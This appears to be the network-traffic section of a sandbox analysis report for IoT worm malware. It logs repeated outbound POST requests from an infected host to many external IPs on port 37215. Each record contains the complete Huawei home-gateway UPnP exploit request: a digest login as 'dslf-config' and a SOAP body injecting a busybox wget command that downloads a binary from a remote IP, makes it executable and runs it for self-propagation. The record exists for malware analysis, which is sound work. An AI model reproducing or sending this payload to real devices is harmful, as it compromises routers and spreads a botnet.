                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1340192.168.2.1339712156.252.116.2137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456810951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1341192.168.2.1339494197.193.79.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456810951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1342192.168.2.133945441.43.111.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456834078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1343192.168.2.1337544157.188.42.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456835985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1344192.168.2.135739883.10.31.5637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.456897020 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1345192.168.2.135687441.56.189.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457679987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1346192.168.2.133831892.254.49.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457711935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1347192.168.2.134376639.221.238.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457747936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1348192.168.2.134116241.173.178.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457767010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1349192.168.2.134661641.81.162.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.457803011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 